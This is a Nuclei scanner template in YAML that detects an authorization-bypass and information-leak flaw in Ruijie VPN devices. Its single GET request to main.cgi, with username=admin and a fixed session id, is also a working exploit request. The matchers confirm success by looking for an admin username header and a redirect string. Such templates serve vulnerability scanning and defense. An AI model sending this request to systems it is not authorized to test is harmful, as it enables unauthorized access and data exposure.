id: ruijie-VPN-leakage

info:
  name: 锐捷VPN越权绑定&信息泄露
  author: str1am
  severity: high
  reference:
    - https://mp.weixin.qq.com/s/iRmDQJH23FJ6mL_GzXeL6g
  tags: ruijie,leakage

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/main.cgi?oper=showsvr&encode=utf-8&username=admin&sid=1614345312&oper=showres"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "self.location.href='/cgi-bin/main.cgi?oper=tomain&showwhat=showres'"

      - type: word
        words:
          - "UserName=admin"
        part: header

      - type: status
        status:
          - 200